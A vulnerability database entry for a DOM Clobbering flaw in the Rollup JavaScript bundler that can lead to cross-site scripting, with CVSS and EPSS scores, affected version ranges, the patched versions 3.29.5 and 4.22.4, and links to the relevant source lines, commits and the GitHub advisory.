CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
16.3%
SSVC
Exploitation
poc
Automatable
no
Technical Impact
partial
Rollup is a module bundler for JavaScript. Versions prior to 3.29.5 and 4.22.4 are susceptible to a DOM Clobbering vulnerability when bundling scripts with properties from import.meta
(e.g., import.meta.url
) in cjs
/umd
/iife
format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img
tag with an unsanitized name
attribute) are present. Versions 3.29.5 and 4.22.4 contain a patch for the vulnerability.
[
{
"cpes": [
"cpe:2.3:a:rollup:rollup:*:*:*:*:*:*:*:*"
],
"vendor": "rollup",
"product": "rollup",
"versions": [
{
"status": "affected",
"version": "0",
"lessThan": "3.29.5",
"versionType": "custom"
},
{
"status": "affected",
"version": "4.0.0",
"lessThan": "4.22.4",
"versionType": "custom"
}
],
"defaultStatus": "unknown"
}
]
github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4
github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541
github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
EPSS
Percentile
16.3%
SSVC
Exploitation
poc
Automatable
no
Technical Impact
partial